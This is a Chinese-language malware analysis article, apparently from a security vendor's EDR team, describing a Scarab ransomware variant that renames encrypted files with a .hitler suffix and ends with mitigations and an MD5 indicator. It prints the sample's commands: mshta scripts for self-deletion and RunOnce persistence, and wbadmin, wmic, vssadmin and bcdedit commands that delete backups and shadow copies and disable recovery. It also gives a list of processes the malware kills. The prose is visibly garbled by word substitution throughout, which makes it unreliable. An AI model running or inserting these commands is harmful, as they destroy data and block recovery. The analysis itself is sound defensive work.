Scarab勒索病毒最新变种,希特勒“冠名”

媒介

笃信服EDR安然团队跟踪了Scarab打单病毒的最新变种,该变种文件加密后缀为.hitler,有趣的是,希特勒对应的英文便是hitler,算是莫名躺枪了。

平日,Scarab打单病毒是使用Necurs僵尸收集进行传播的,Necurs是天下上最大年夜的僵尸收集之一,曾用于传播多个恶意家族样本。近来一段光阴,发明Scarab打单病毒还会经由过程RDP爆破+人工、绑缚软件的要领进行传播。

下图,是此变种的打单信息。

一、功能概述

此Scarab变种,其功能流程大年夜致如下,依次分手为冒充录屏、屏幕快照、内存解密、设置启动、自删除、删除卷影、杀进程、遍历加密、打单弹窗。

冒充录屏,是为了骗过安然软件,让其误以为是一个正常的录屏软件。此外,还截图了屏幕快照。与多半病毒一样,此打单变种同样会设置启动,做持久化操作,也会做自删除的动作。为了包管数据弗成规复,同时也做了删除卷影的操作。

此外,此打单病毒会杀掉落多半的系统进程、利用进程、杀掉落进程,着末遍历文件夹,做加密。所有的文件加密成功后,弹出打单信息。

二、具体阐发

查壳,母体样本应用的是UPX加壳:

样本应用了具体的文件描述信息:

脱壳阐发,动态调试:

录制音频:

响应的反汇编代码:

创建窗口:

获取操作系统说话版本:

设置HOOK:

抓屏操作:

启动子进程:

进行持久化操作,拷贝自身到%appdata%目录下:

拷贝之后:

然后启动%appdata%目录下的sevnz.exe法度榜样:

解密内存响应的字符串:

经由过程履行mshta.exe,删除自身:

响应的敕令行,如下:

mshta.exe “javascript:o=new ActiveXObject(‘Scripting.FileSystemObject’);

setInterval(function(){try{o.DeleteFile(‘Scarab.exe’);close()}catch(e){}},10);”

[1] [2] [3]下一页

调用mshta.exe法度榜样,设置自启动项:

响应的敕令行:

mshta.exe “javascript:o=new ActiveXObject(‘WScript.Shell’);

x=new ActiveXObject(‘Scripting.FileSystemObject’);

setInterval(function()

{try

{i=x.GetFile(‘sevnz.exe’).Path;

o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\iyryCNqPEUF’,i);

}catch(e){}

},

10);”

设置完成之后:

经由过程mshta.exe设置响应的注册表项:

将响应的删除系统备份,磁盘卷影操作的敕令行,设置为注册表项:

经由过程mshta.exe履行敕令:

响应的敕令行:

o=new ActiveXObject(“WScript.Shell”);

o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0”,0);

o.Run(“cmd.exe /c wmic SHADOWCOPY DELETE”,0);

o.Run(“cmd.exe /c vssadmin Delete Shadows /All /Quiet”,0);

o.Run(“cmd.exe /c bcdedit /set {default} recoveryenabled No”,0);

o.Run(“cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures”,0);

遍历进程:

发明相关的进程,则停止进程:

相关进程列表如下:

ccleaner.exe;ccleaner64.exe;tasklist.exe;taskmgr.exe;regedit.exe;anvir.exe;anvir64.exe;cscript.exe;wscript.exe;powershell.exe;procexp.exe;far.exe;agntsvc.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;agntsvc.exeisqlplussvc.exe;dbeng50.exe;dbsnmp.exe;excel.exe;firefoxconfig.exe;infopath.exe;isqlplussvc.exe;msaccess.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ncsvc.exe;ocautoupds.exe;ocomm.exe;ocssd.exe;onenote.exe;oracle.exe;outlook.exe;powerpnt.exe;sqbcoreservice.exe;sqlagent.exe;sqlbrowser.exe;sqlserver.exe;sqlservr.exe;sqlwriter.exe;steam.exe;synctime.exe;tbirdconfig.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;xfssvccon.exe;

内存解密出响应的加密字符串,然后设置为注册表项:

在内存中解密天生响应的打单信息,用户的加密ID:

遍历文件,内存中加密响应的文件,文件名随机天生,文件后缀为hitler:

然后调换到原始的文件:

然后设置加密后的文件属性:

遍历文件的时刻,会判断是否为加密文件列表中的后缀,响应的后缀列表有二百多种:

部分后缀名列表:

同时会遍历响应的文件目录,扫除以下文件目录,响应的文件目录列表如下:

上一页[1] [2] [3]下一页

\$RECYCLE.BIN\;

\All Users\;

\AppData\;

\ApplicationData\;

\System Volume Information\;

\Windows\;

\intel\;

\nvidia\;

\Trend Micro\;

在加密文件的目录下,天生对应的打单信息文本文件,然后将之前内存天生的打单信息,写入到文件:

打单信息文本文件HOW TO RECOVER ENCRYPTED FILES.TXT,着末经由过程履行notepad.exe法度榜样,弹出响应的打单信息,履行的敕令行如下:

notepad.exe “C:\Users\panda\HOW TO RECOVER ENCRYPTED FILES.TXT”

三、办理规划

提醒广大年夜用户做好病毒检测与防御步伐,防护打单病毒进击。

1、及时给电脑打补丁,修复破绽。

2、对紧张的数据文件按期进行非本地备份。

3、不要点击滥觞不明的邮件附件,不从不明网站下载软件。

4、只管即便关闭不需要的文件共享权限。

5、变动帐号密码,设置强密码,避免应用统一的密码,由于统一的密码会导致一台被攻破,多台遭殃。

6、Scarab打单病毒最新变种会使用RDP(远程桌面协议),假如营业上无需应用RDP的,建议关闭RDP。当呈现此类事故时,保举应用笃信服防火墙,或者终端检测相应平台(EDR)的微隔离功能对3389等端口进行封堵,防止扩散。

四、IOC

MD5

374F8ACCC92838939A6D3960AAB36AA0

上一页[1] [2] [3]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包